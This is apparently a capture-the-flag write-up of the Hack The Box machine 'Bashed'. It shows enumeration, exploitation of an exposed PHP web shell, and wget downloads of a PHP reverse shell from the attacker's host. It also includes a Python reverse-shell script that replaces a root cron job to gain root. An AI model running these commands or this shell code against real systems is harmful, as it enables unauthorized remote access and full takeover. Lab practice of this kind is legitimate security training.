Another OSCP-like Box: Bashed
This is my fifth writeup for this series.
Enumeration
As usual, I started my enumeration with Nmap.
sudo nmap -sC -sV 10.10.10.68 -oA default-scan
I only saw TCP port 80 on this box. I then ran Masscan to confirm all open TCP ports.
sudo masscan -p1–65535 -i tun0 10.10.10.68
Since HTTP was running on the host, I then used Gobuster to check for any exposed folders.
sudo apt gobuster
sudo gobuster dir -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I browsed the exposed folders and saw some interesting files in /dev directory.
The phpbash.php was some type of a webshell.
Exploitation
I ran “id” to check my privilege of this web shell.
Since the box runs PHP script, I then used a PHP reverse shell script from Pentestmonkey.
locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .
I then changed the IP in the script to the IP of my Kali.
nano php-reverse-shell.php
I saved the edited script and run SimpleHTTPServer to host the file.
sudo python -m SimpleHTTPServer 80
In the webshell, I transferred the php-reverse-shell script to Bashed using wget. The default directory, /var/www/html/dev is not writable. I changed my directory to /dev/shm.
cd /dev/shm
wget http://10.10.14.7/php-reverse-shell.php
Listener
I then set up a Netcat listener on port 8888 in another terminal.
I executed the script to get a reverse shell access.
php php-reverse-shell.php
I upgraded my access to an interactive shell by following this link.
whoami&&id&&hostname
Post Exploitation
Next, I continued with escalating my privilege to root access. I used a tool called Linux Smart Enumeration from Github.
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
I transferred Linux Smart Enumeration to /dev/shm in Bashed.
I then executed the script using the command below.
bash lse.sh -i
I noticed that Scriptmanager user can run Sudo with no password. I immediately switched my access to Scriptmanager.
sudo -i -u scriptmanager
I ran Linux Smart Enumeration again, however I didn't get any results that is useful in privilege escalation. I then downloaded a tool call Pspy. This is useful in checking for any running Cron jobs . The tool can be downloaded from this Github link.
I transferred the Pspy script to Bashed using Wget.
wget http://10.10.14.7/pspy64s
I then enabled the execute permission of the file and ran it.
chmod +x pspy64s
While running Pspy, I noticed that test.py was running every minute and it was executed by root(uid=0).
I then searched for that test.py file. I went to “/” directory and ran the command below . These command looked for directories and files that were writable by Scriptmanager.
find / -maxdepth 1 -writable -type ffind / -maxdepth 1 -writable -type d
I checked the /scripts directory and found the test.py script. This script was owned by Scriptmanager so I can changed it if need be.
Looking at test.py, this script opens test.txt and writes something to it.
I also noticed that test.txt that was created by test.py script was owned by root. If I can spawn a shell using test.py script, that shell will have root access. I tried to edit test.py in Bashed but I wasn't successful.
In another Kali terminal, I created a file named test.py using Nano.
nano test.py
I added the script below, I made sure to put the IP Address of my Kali.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“10.10.14.7”,8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
In the Bashed terminal running as Scriptmanager, I changed the name of test.py to test.bak
I then transferred the test.py from Kali to Bashed while I had a Netcat listener running on port 8888.
wget http://10.10.14.7/test.py
After a minute, I got a root shell access in the new Netcat listener.
Flags
Key Takeaways
- Always limit access to files and folders that are very important to the systems or networks
- Avoid having a web shell access on a server, If there is a need for one, make sure to implement compensating security controls
- In this writeup, we used Nmap for enumeration together with Masscan.
- For directory bruteforcing, we can use tools such as Gobuster, Drib, Dirsearch, etc,
- In privilege escalation, we can use automated script such as Linux Smart Enumeration and Pspy to look for possible attack surface.